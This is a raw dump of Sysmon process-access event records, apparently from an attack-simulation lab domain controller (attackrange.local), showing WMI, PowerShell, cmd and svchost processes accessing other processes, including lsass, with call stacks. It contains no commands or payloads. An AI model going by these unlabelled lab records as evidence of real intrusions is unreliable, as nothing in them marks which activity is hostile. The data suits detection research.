13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 